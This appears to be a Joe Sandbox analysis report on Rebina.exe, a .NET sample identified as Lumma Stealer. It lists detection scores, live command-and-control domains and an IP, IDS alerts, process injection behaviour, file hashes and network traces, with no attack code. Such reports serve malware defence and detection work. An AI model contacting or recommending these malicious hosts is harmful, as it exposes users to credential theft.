    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1500380 Sample: Rebina.exe Startdate: 28/08/2024 Architecture: WINDOWS Score: 100 25 assumptionflattyou.shop 2->25 29 Multi AV Scanner detection for domain / URL 2->29 31 Suricata IDS alerts for network traffic 2->31 33 Found malware configuration 2->33 35 9 other signatures 2->35 8 Rebina.exe 2 2->8         started        signatures3 process4 file5 23 C:\Users\user\AppData\...\Rebina.exe.log, ASCII 8->23 dropped 37 Contains functionality to inject code into remote processes 8->37 39 Writes to foreign memory regions 8->39 41 Allocates memory in foreign processes 8->41 43 2 other signatures 8->43 12 RegAsm.exe 8->12         started        15 conhost.exe 8->15         started        17 RegAsm.exe 8->17         started        19 RegAsm.exe 8->19         started        signatures6 process7 dnsIp8 27 assumptionflattyou.shop 104.21.66.182, 443, 49704, 49705 CLOUDFLARENETUS United States 12->27 21 WerFault.exe 20 16 12->21         started        process9

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    Rebina.exe60%VirustotalBrowse
    Rebina.exe100%AviraHEUR/AGEN.1357677
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    assumptionflattyou.shop16%VirustotalBrowse
    SourceDetectionScannerLabelLink
    http://upx.sf.net0%URL Reputationsafe
    evoliutwoqm.shop0%Avira URL Cloudsafe
    condedqpwqm.shop100%Avira URL Cloudphishing
    https://assumptionflattyou.shop/api100%Avira URL Cloudphishing
    stamppreewntnq.shop100%Avira URL Cloudphishing
    assumptionflattyou.shop100%Avira URL Cloudphishing
    caffegclasiqwp.shop100%Avira URL Cloudmalware
    locatedblsoqp.shop100%Avira URL Cloudphishing
    https://assumptionflattyou.shop/api14%VirustotalBrowse
    assumptionflattyou.shop16%VirustotalBrowse
    stamppreewntnq.shop18%VirustotalBrowse
    https://assumptionflattyou.shop/100%Avira URL Cloudphishing
    condedqpwqm.shop18%VirustotalBrowse
    https://assumptionflattyou.shop/api:100%Avira URL Cloudphishing
    evoliutwoqm.shop6%VirustotalBrowse
    millyscroqwp.shop100%Avira URL Cloudmalware
    https://assumptionflattyou.shop/pic100%Avira URL Cloudphishing
    locatedblsoqp.shop18%VirustotalBrowse
    stagedchheiqwo.shop100%Avira URL Cloudphishing
    traineiwnqo.shop100%Avira URL Cloudmalware
    https://assumptionflattyou.shop/16%VirustotalBrowse
    millyscroqwp.shop22%VirustotalBrowse
    stagedchheiqwo.shop18%VirustotalBrowse
    caffegclasiqwp.shop21%VirustotalBrowse
    traineiwnqo.shop21%VirustotalBrowse
    https://assumptionflattyou.shop/api:14%VirustotalBrowse
    NameIPActiveMaliciousAntivirus DetectionReputation
    assumptionflattyou.shop
    104.21.66.182
    truetrueunknown
    NameMaliciousAntivirus DetectionReputation
    stamppreewntnq.shoptrue
    • 18%, Virustotal, Browse
    • Avira URL Cloud: phishing
    unknown
    condedqpwqm.shoptrue
    • 18%, Virustotal, Browse
    • Avira URL Cloud: phishing
    unknown
    https://assumptionflattyou.shop/apitrue
    • 14%, Virustotal, Browse
    • Avira URL Cloud: phishing
    unknown
    evoliutwoqm.shoptrue
    • 6%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    assumptionflattyou.shoptrue
    • 16%, Virustotal, Browse
    • Avira URL Cloud: phishing
    unknown
    locatedblsoqp.shoptrue
    • 18%, Virustotal, Browse
    • Avira URL Cloud: phishing
    unknown
    caffegclasiqwp.shoptrue
    • 21%, Virustotal, Browse
    • Avira URL Cloud: malware
    unknown
    millyscroqwp.shoptrue
    • 22%, Virustotal, Browse
    • Avira URL Cloud: malware
    unknown
    stagedchheiqwo.shoptrue
    • 18%, Virustotal, Browse
    • Avira URL Cloud: phishing
    unknown
    traineiwnqo.shoptrue
    • 21%, Virustotal, Browse
    • Avira URL Cloud: malware
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://upx.sf.netAmcache.hve.8.drfalse
    • URL Reputation: safe
    unknown
    https://assumptionflattyou.shop/RegAsm.exe, 00000004.00000002.2248451370.000000000105A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2248451370.0000000001074000.00000004.00000020.00020000.00000000.sdmptrue
    • 16%, Virustotal, Browse
    • Avira URL Cloud: phishing
    unknown
    https://assumptionflattyou.shop/api:RegAsm.exe, 00000004.00000002.2248451370.0000000001074000.00000004.00000020.00020000.00000000.sdmptrue
    • 14%, Virustotal, Browse
    • Avira URL Cloud: phishing
    unknown
    https://assumptionflattyou.shop/picRegAsm.exe, 00000004.00000002.2248451370.0000000001074000.00000004.00000020.00020000.00000000.sdmptrue
    • Avira URL Cloud: phishing
    unknown
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    104.21.66.182
    assumptionflattyou.shopUnited States
    13335CLOUDFLARENETUStrue
    Joe Sandbox version:40.0.0 Tourmaline
    Analysis ID:1500380
    Start date and time:2024-08-28 11:16:07 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 4m 38s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:12
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:Rebina.exe
    Detection:MAL
    Classification:mal100.troj.evad.winEXE@9/6@1/1
    EGA Information:
    • Successful, ratio: 100%
    HCA Information:
    • Successful, ratio: 97%
    • Number of executed functions: 15
    • Number of non-executed functions: 55
    Cookbook Comments:
    • Found application associated with file extension: .exe
    • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
    • Excluded IPs from analysis (whitelisted): 104.208.16.94, 13.89.179.12
    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
    • Not all processes where analyzed, report is missing behavior information
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    TimeTypeDescription
    05:17:00API Interceptor1x Sleep call for process: RegAsm.exe modified
    05:17:18API Interceptor1x Sleep call for process: WerFault.exe modified
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    104.21.66.182https://assets-usa.mkt.dynamics.com/492791da-6fc7-ee11-9075-6045bd00390b/digitalassets/standaloneforms/35c1b077-37d2-ee11-9079-000d3a32e3b3Get hashmaliciousHTMLPhisherBrowse
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      assumptionflattyou.shop80441fcf.exeGet hashmaliciousLummaCBrowse
      • 172.67.163.54
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      CLOUDFLARENETUSsetup.exeGet hashmaliciousLummaCBrowse
      • 104.21.42.119
      Payment Details.exeGet hashmaliciousFormBookBrowse
      • 104.21.72.245
      https://en.aiacademy.twGet hashmaliciousUnknownBrowse
      • 104.17.24.14
      file.exeGet hashmaliciousUnknownBrowse
      • 172.64.41.3
      https://emea.dcv.ms/haHCQHi4RDGet hashmaliciousHTMLPhisherBrowse
      • 188.114.96.3
      https://iv1tm.ykrbkt.ru/iV1TM/#hans.wurst@us.comGet hashmaliciousHTMLPhisherBrowse
      • 172.67.153.202
      https://aka.ms/LearnAboutSenderIdentificationGet hashmaliciousHTMLPhisherBrowse
      • 104.18.36.155
      file.exeGet hashmaliciousUnknownBrowse
      • 188.114.96.3
      file.exeGet hashmaliciousUnknownBrowse
      • 188.114.96.3
      file.exeGet hashmaliciousUnknownBrowse
      • 172.64.41.3
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      a0e9f5d64349fb13191bc781f81f42e1setup.exeGet hashmaliciousLummaCBrowse
      • 104.21.66.182
      UploadCustomersTemplate(2).xlsmGet hashmaliciousUnknownBrowse
      • 104.21.66.182
      file.exeGet hashmaliciousUnknownBrowse
      • 104.21.66.182
      file.exeGet hashmaliciousUnknownBrowse
      • 104.21.66.182
      bViL3vNljZ.exeGet hashmaliciousUnknownBrowse
      • 104.21.66.182
      bViL3vNljZ.exeGet hashmaliciousUnknownBrowse
      • 104.21.66.182
      run.exeGet hashmaliciousCrypto MinerBrowse
      • 104.21.66.182
      Apponde2.exeGet hashmaliciousAveMaria, UACMe, XRedBrowse
      • 104.21.66.182
      file.exeGet hashmaliciousLummaCBrowse
      • 104.21.66.182
      file.exeGet hashmaliciousLummaC, VidarBrowse
      • 104.21.66.182
      No context
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):0.9881684844940527
      Encrypted:false
      SSDEEP:192:DBqZeFy/G+505RLpjezEK2zuiFIZ24IO88:83G+a5RLpjeozuiFIY4IO88
      MD5:38A0A4D4CD01AC9C33B656D38165768F
      SHA1:1177EC8874FCCD7F98693FC32DECE2DA29F434A5
      SHA-256:D064900CB6EB901669BEC50A8CB26044F99A18E2C8111B7E7C6325984F0DBDF0
      SHA-512:D327F508D34F804C2280131A6DD96C402B1FCE5EAC5420CD1E95C2D454D25A2EABA1B57DCA057A51FD2E7E656EE434A7FCB2F946DAF14301DD4AADE32371D0F1
      Malicious:false
      Reputation:low
      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.3.1.0.2.2.2.2.5.9.9.4.5.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.3.1.0.2.2.2.6.8.1.8.0.6.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.4.a.7.a.a.6.2.-.d.6.6.6.-.4.1.6.1.-.b.5.b.b.-.c.2.0.7.0.4.d.6.0.b.a.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.5.3.4.1.d.0.d.-.8.f.f.e.-.4.1.f.4.-.a.3.4.a.-.f.1.f.e.5.4.6.2.b.4.7.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.g.A.s.m...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.A.s.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.7.0.-.0.0.0.1.-.0.0.1.4.-.f.8.d.0.-.8.0.0.9.2.b.f.9.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.2.3.0.a.b.5.5.5.9.e.8.0.6.5.7.4.d.2.6.b.4.c.2.0.8.4.7.c.3.6.8.e.d.5.5.4.8.3.b.0.!.R.e.g.A.s.
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:Mini DuMP crash report, 15 streams, Wed Aug 28 09:17:02 2024, 0x1205a4 type
      Category:dropped
      Size (bytes):91678
      Entropy (8bit):2.010325139279081
      Encrypted:false
      SSDEEP:384:JkMJV5HnE69ebjfW45aNETolGnPm7utxNdamYkf:JJ5n0jfW45oGPm7ixf/
      MD5:AA457A89964C8122A981B8D169FD27F0
      SHA1:183E0DEFFB5EF88B45E5123CC669DC13C09B0724
      SHA-256:879022D02E4E6C8A332AA20031F435C2111608E657C1E27EFA0C0DA8DE39D205
      SHA-512:1AC25F429CBBA3A98628F5E7B3B920551610132EEF2AB0DF13E390AC73F2A59CDB05898EF6AAB9D422D0F8170991849C69A8DF407C01B8F3163C4F78BA1B3920
      Malicious:false
      Reputation:low
      Preview:MDMP..a..... ..........f............T...........8...h.......<...............>?..........`.......8...........T............>...'.......................!..............................................................................eJ......`"......GenuineIntel............T.......p......f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
      Category:dropped
      Size (bytes):6348
      Entropy (8bit):3.7092062891647277
      Encrypted:false
      SSDEEP:96:RSIU6o7wVetbAq6bMY1JUf6i5a5aMQUG89b5psff4Szm:R6l7wVeJAq6bMY1JUspDG89b5psfgSzm
      MD5:03C356249770C2046959BF0E539C37BF
      SHA1:82AD79460051DA43814B4C8746DB9D4B090343A4
      SHA-256:ED664B551B19C7FB6795C4599FE9287AB165B749E2A5F41CBD2C2B35373CB109
      SHA-512:781C62DC19F194BE896FAD0169E6AE075A1218E66927177CC5127C321DF2BEA9F34D1EE1B55FD87DA0356B5E5C82EF4129F9629E3F2266CED018B6A875341606
      Malicious:false
      Reputation:low
      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.2.3.2.<./.P.i.
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):4737
      Entropy (8bit):4.43403653891875
      Encrypted:false
      SSDEEP:48:cvIwWl8zs6Jg77aI95WWpW8VYrYm8M4JfuR1eFK+q8vsR1eQgLuOLuhrd:uIjfII7737VDJfuzhKszeBukuhrd
      MD5:107F75A74944D0CC113BC9DA4F5FCEE5
      SHA1:6AD29E1165F73F0395066A5618939C0941DF8D01
      SHA-256:F5FDA09699AD7D9C3864484EDD647F2B9CB8D4D73F12AC652D1319D2311D374F
      SHA-512:307B850B9E4373C83E11CAD40538C49EC983495C67EDB878FF7CAF7AF9520DB32CA764444811B4B1DCAEC3551BD1EBAC040AC0CA3B7B56A221790E55430D3F25
      Malicious:false
      Reputation:low
      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="475219" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
      Process:C:\Users\user\Desktop\Rebina.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):42
      Entropy (8bit):4.0050635535766075
      Encrypted:false
      SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
      MD5:84CFDB4B995B1DBF543B26B86C863ADC
      SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
      SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
      SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
      Malicious:true
      Reputation:high, very likely benign file
      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:MS Windows registry file, NT/2000 or above
      Category:dropped
      Size (bytes):1835008
      Entropy (8bit):4.422374691462711
      Encrypted:false
      SSDEEP:6144:lSvfpi6ceLP/9skLmb0OTyWSPHaJG8nAgeMZMMhA2fX4WABlEnNk0uhiTw:svloTyW+EZMM6DFye03w
      MD5:8ED495D0FAABEA34036D676EF6217D05
      SHA1:67275626AF9493A46D471E2BD149BB2B703EB0AA
      SHA-256:F98B66082B67BACA917372CD43FD359CF99B779347D4556F5EBD66FF78700D61
      SHA-512:21FAA5773884101641D633255AD6E429E2675EB435F8C2744C86EFDDAF59854294A61BE4A8F5CC951C1F6A8346DBA14905C421B17F30F521DBD99D4F50B95CCC
      Malicious:false
      Reputation:low
      Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.}..+................................................................................................................................................................................................................................................................................................................................................N.>........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
      Entropy (8bit):7.985952277085943
      TrID:
      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
      • Win32 Executable (generic) a (10002005/4) 49.78%
      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
      • Generic Win/DOS Executable (2004/3) 0.01%
      • DOS Executable Generic (2002/1) 0.01%
      File name:Rebina.exe
      File size:292'352 bytes
      MD5:30cbc399e37eef662eaeb7d90148f013
      SHA1:349839e58f61a81512d2545bd70ca0d0d7baa549
      SHA256:bfde2ff885475fc1212ff255cc5f4e17b0ede10a8ee21b7b83cd34fc0ad73a03
      SHA512:821921b0bbf6472a2d2c9bfcb16b574b4b8f3d39a87de6b8519d26f419fb57adcfd9773fb9098c827404355331398b683c162f48fc33702dfe75e8068b667491
      SSDEEP:6144:7vFbmrw0Bo5jT5jI5wG1BGkdshosD++gtFLJh3gPK6OcpcVfCZK5V:58w0WTjfsBGkqd++VSupkfCE
      TLSH:DD542377B788CBD6EF1D3B795E183216A2A1F6C6405BDF053D4462E48E392E385823C6
      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................l..........~.... ........@.. ....................................`................................
      Icon Hash:00928e8e8686b000
      Entrypoint:0x448b7e
      Entrypoint Section:.text
      Digitally signed:false
      Imagebase:0x400000
      Subsystem:windows cui
      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Time Stamp:0x66CBB4F6 [Sun Aug 25 22:49:26 2024 UTC]
      TLS Callbacks:
      CLR (.Net) Version:
      OS Version Major:4
      OS Version Minor:0
      File Version Major:4
      File Version Minor:0
      Subsystem Version Major:4
      Subsystem Version Minor:0
      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
      Instruction
      jmp dword ptr [00402000h]
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      NameVirtual AddressVirtual Size Is in Section
      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IMPORT0x48b280x53.text
      IMAGE_DIRECTORY_ENTRY_RESOURCE0x4a0000x5b8.rsrc
      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
      IMAGE_DIRECTORY_ENTRY_BASERELOC0x4c0000xc.reloc
      IMAGE_DIRECTORY_ENTRY_DEBUG0x489f00x1c.text
      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
      .text0x20000x46b840x46c00ad997e56abcfdc446e072f1c1a242a28False0.9925256735865724data7.994595123284687IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      .rsrc0x4a0000x5b80x600b3436a9230e3967a868bb2ffadc57bdaFalse0.4329427083333333data4.1126341791758IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
      .reloc0x4c0000xc0x2009df8ed85660499e5794476e7a65fc83bFalse0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
      NameRVASizeTypeLanguageCountryZLIB Complexity
      RT_VERSION0x4a0a00x328data0.44925742574257427
      RT_MANIFEST0x4a3c80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041
      DLLImport
      mscoree.dll_CorExeMain
      TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
      2024-08-28T11:17:02.186665+0200TCP2049812ET MALWARE Lumma Stealer Related Activity M2149705443192.168.2.5104.21.66.182
      2024-08-28T11:17:02.186665+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin149705443192.168.2.5104.21.66.182
      2024-08-28T11:17:01.289610+0200TCP2049836ET MALWARE Lumma Stealer Related Activity149704443192.168.2.5104.21.66.182
      2024-08-28T11:17:01.289610+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin149704443192.168.2.5104.21.66.182
      TimestampSource PortDest PortSource IPDest IP
      Aug 28, 2024 11:17:00.639401913 CEST49704443192.168.2.5104.21.66.182
      Aug 28, 2024 11:17:00.639434099 CEST44349704104.21.66.182192.168.2.5
      Aug 28, 2024 11:17:00.639527082 CEST49704443192.168.2.5104.21.66.182
      Aug 28, 2024 11:17:00.640769005 CEST49704443192.168.2.5104.21.66.182
      Aug 28, 2024 11:17:00.640785933 CEST44349704104.21.66.182192.168.2.5
      Aug 28, 2024 11:17:01.127248049 CEST44349704104.21.66.182192.168.2.5
      Aug 28, 2024 11:17:01.127331972 CEST49704443192.168.2.5104.21.66.182
      Aug 28, 2024 11:17:01.131596088 CEST49704443192.168.2.5104.21.66.182
      Aug 28, 2024 11:17:01.131604910 CEST44349704104.21.66.182192.168.2.5
      Aug 28, 2024 11:17:01.131890059 CEST44349704104.21.66.182192.168.2.5
      Aug 28, 2024 11:17:01.181319952 CEST49704443192.168.2.5104.21.66.182
      Aug 28, 2024 11:17:01.186429977 CEST49704443192.168.2.5104.21.66.182
      Aug 28, 2024 11:17:01.186429977 CEST49704443192.168.2.5104.21.66.182
      Aug 28, 2024 11:17:01.186561108 CEST44349704104.21.66.182192.168.2.5
      Aug 28, 2024 11:17:01.289619923 CEST44349704104.21.66.182192.168.2.5
      Aug 28, 2024 11:17:01.289666891 CEST44349704104.21.66.182192.168.2.5
      Aug 28, 2024 11:17:01.289711952 CEST49704443192.168.2.5104.21.66.182
      Aug 28, 2024 11:17:01.289726019 CEST44349704104.21.66.182192.168.2.5
      Aug 28, 2024 11:17:01.294167042 CEST44349704104.21.66.182192.168.2.5
      Aug 28, 2024 11:17:01.294229984 CEST49704443192.168.2.5104.21.66.182
      Aug 28, 2024 11:17:01.294239044 CEST44349704104.21.66.182192.168.2.5
      Aug 28, 2024 11:17:01.294262886 CEST44349704104.21.66.182192.168.2.5
      Aug 28, 2024 11:17:01.294362068 CEST49704443192.168.2.5104.21.66.182
      Aug 28, 2024 11:17:01.296777964 CEST49704443192.168.2.5104.21.66.182
      Aug 28, 2024 11:17:01.296789885 CEST44349704104.21.66.182192.168.2.5
      Aug 28, 2024 11:17:01.296844006 CEST49704443192.168.2.5104.21.66.182
      Aug 28, 2024 11:17:01.296849012 CEST44349704104.21.66.182192.168.2.5
      Aug 28, 2024 11:17:01.303205013 CEST49705443192.168.2.5104.21.66.182
      Aug 28, 2024 11:17:01.303231955 CEST44349705104.21.66.182192.168.2.5
      Aug 28, 2024 11:17:01.303333044 CEST49705443192.168.2.5104.21.66.182
      Aug 28, 2024 11:17:01.303661108 CEST49705443192.168.2.5104.21.66.182
      Aug 28, 2024 11:17:01.303675890 CEST44349705104.21.66.182192.168.2.5
      Aug 28, 2024 11:17:01.767501116 CEST44349705104.21.66.182192.168.2.5
      Aug 28, 2024 11:17:01.767616034 CEST49705443192.168.2.5104.21.66.182
      Aug 28, 2024 11:17:01.778939962 CEST49705443192.168.2.5104.21.66.182
      Aug 28, 2024 11:17:01.778956890 CEST44349705104.21.66.182192.168.2.5
      Aug 28, 2024 11:17:01.779216051 CEST44349705104.21.66.182192.168.2.5
